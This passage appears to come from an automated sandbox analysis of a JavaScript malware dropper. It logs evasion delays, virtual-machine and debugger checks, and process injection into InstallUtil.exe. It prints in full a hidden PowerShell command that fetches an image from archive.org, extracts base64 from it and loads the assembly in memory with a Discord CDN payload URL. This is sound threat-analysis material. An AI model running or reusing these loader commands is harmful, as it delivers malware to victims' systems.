                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97790s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97681s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97307s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97200s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628Thread sleep time: -97092s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99669Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99342Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99207Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98940Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98202Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97521Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99764Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99655Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99325Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99217Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99105Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98666Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98451Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98120Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97904Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97790Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97681Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97307Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97200Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97092Jump to behavior
                      Source: wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024849450.000001D4ABB64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WqkbkaAcxetWUzQemUedKoeNKlomWecKmZPaPBCgLPTeKaNTLiLGhhUANRlWvfaUmkATzlWOlNLLeQkAKPfkrSPGLt
                      Source: wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xATZJqWZtBqemUqLPzhAsJZuZhteUWIGskiRzLcZiaxBUcxndQUgOdqnLUPLhodOLZbNfOHcuWCccLpoooZUkLAKqi
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: wscript.exe, 00000000.00000003.2019675088.000001D4ABB6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZxATZJqWZtBqemUqLPzhAsJZuZhteUWIGskiRzLcZiaxBUcxndQUgOdqnLUPLhodOLZbNfOHcuWCccLpoooZUkLAKqiBhe
                      Source: wscript.exe, 00000000.00000003.2026096461.000001D4ABF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025841554.000001D4A9D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025967402.000001D4ABE81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018985410.000001D4ABC48000.00000004.00000020.00020000.00000000.sdmp, RFQ448903423_MAT_HASUE_de_Mexico.jsBinary or memory string: var dpLNNqPKJbePbzZGGLLfzziaZGNnkORbmWitczOKNbncUvThUPibnascULGWeTaIugNHmtfifltLfGPcjABAcKLWWB = "xATZJqWZtBqemUqLPzhAsJZuZhteUWIGskiRzLcZiaxBUcxndQUgOdqnLUPLhodOLZbNfOHcuWCccLpoooZUkLAKqi";
                      Source: InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: wscript.exe, 00000000.00000003.2020928827.000001D4ABDF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026096461.000001D4ABF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025742948.000001D4AC28E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025841554.000001D4A9D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025967402.000001D4ABE81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018985410.000001D4ABC48000.00000004.00000020.00020000.00000000.sdmp, RFQ448903423_MAT_HASUE_de_Mexico.jsBinary or memory string: var WqkbkaAcxetWUzQemUedKoeNKlomWecKmZPaPBCgLPTeKaNTLiLGhhUANRlWvfaUmkATzlWOlNLLeQkAKPfkrSPGLt = "UBehRkbeNiseNfpnZqLivcAkiNgcqRWzJxcGKWfcGBrxsWWQUeozoceUKmifhUpGLGZWZpbxKKrZGKobkghIbiaRid";
                      Source: wscript.exe, 00000000.00000003.2019165000.000001D4ABC30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZWqkbkaAcxetWUzQemUedKoeNKlomWecKmZPaPBCgLPTeKaNTLiLGhhUANRlWvfaUmkATzlWOlNLLeQkAKPfkrSPGLt@
                      Source: InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                      Source: InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000004.00000002.2144271761.000001CEE97E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00BC70B0 CheckRemoteDebuggerPresent,8_2_00BC70B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi64_1964.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6B1008Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? bp? ? ? ? g0? ? ? ? yqbn? ? ? ? gu? ? ? ? vqby? ? ? ? gw? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? jwbo? ? ? ? hq? ? ? ? d? ? ? ? bw? ? ? ? hm? ? ? ? og? ? ? ? v? ? ? ? c8? ? ? ? aqbh? ? ? ? dy? ? ? ? m? ? ? ? ? ? ? ? x? ? ? ? dy? ? ? ? m? ? ? ? ? ? ? ? 2? ? ? ? c4? ? ? ? dqbz? ? ? ? c4? ? ? ? yqby? ? ? ? gm? ? ? ? a? ? ? ? bp? ? ? ? hy? ? ? ? zq? ? ? ? u? ? ? ? g8? ? ? ? cgbn? ? ? ? c8? ? ? ? mq? ? ? ? w? ? ? ? c8? ? ? ? aqb0? ? ? ? gu? ? ? ? bqbz? ? ? ? c8? ? ? ? z? ? ? ? bl? ? ? ? ge? ? ? ? d? ? ? ? bo? ? ? ? g4? ? ? ? bwb0? ? ? ? gu? ? ? ? xw? ? ? ? y? ? ? ? d? ? ? ? ? ? ? ? mg? ? ? ? 0? ? ? ? d? ? ? ? ? ? ? ? nw? ? ? ? v? ? ? ? gq? ? ? ? zqbh? ? ? ? hq? ? ? ? a? ? ? ? bu? ? ? ? g8? ? ? ? d? ? ? ? bl? ? ? ? c4? ? ? ? agbw? ? ? ? gc? ? ? ? jw? ? ? ? 7? ? ? ? cq? ? ? ? dwbl? ? ? ? gi? ? ? ? qwbs? ? ? ? gk? ? ? ? zqbu? ? ? ? hq? ? ? ? i? ? ? ? ? ? ? ? 9? ? ? ? c? ? ? ? ? ? ? ? tgbl? ? ? ? hc? ? ? ? lqbp? ? ? ? gi? ? ? ? agbl? ? ? ? gm? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? fm? ? ? ? eqbz? ? ? ? hq? ? ? ? zqbt? ? ? ? c4? ? ? ? tgbl? ? ? ? hq? ? ? ? lgbx? ? ? ? gu? ? ? ? ygbd? ? ? ? gw? ? ? ? aqbl? ? ? ? g4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? cq? ? ? ? aqbt? ? ? ? ge? ? ? ? zwbl? ? ? ? ei? ? ? ? eqb0? ? ? ? gu? ? ? ? cw? ? ? ? g? ? ? ? d0? ? ? ? i? ? ? ? ? ? ? ? k? ? ? ? hc? ? ? ? zqbi? ? ? ? em? ? ? ? b? ? ? ? bp? ? ? ? gu? ? ? ? bgb0? ? ? ? c4? ? ? ? r? ? ? ? bv? ? ? ? hc? ? ? ? bgbs? ? ? ? g8? ? ? ? yqbk? ? ? ? eq? ? ? ? yqb0? ? ? ? ge? ? ? ? k? ? ? ? ? ? ? ? k? ? ? ? gk? ? ? ? bqbh? ? ? ? gc? ? ? ? zqbv? ? ? ? hi? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? ds? ? ? ? j? ? ? ? bp? ? ? ? g0? ? ? ? yqbn? ? ? ? 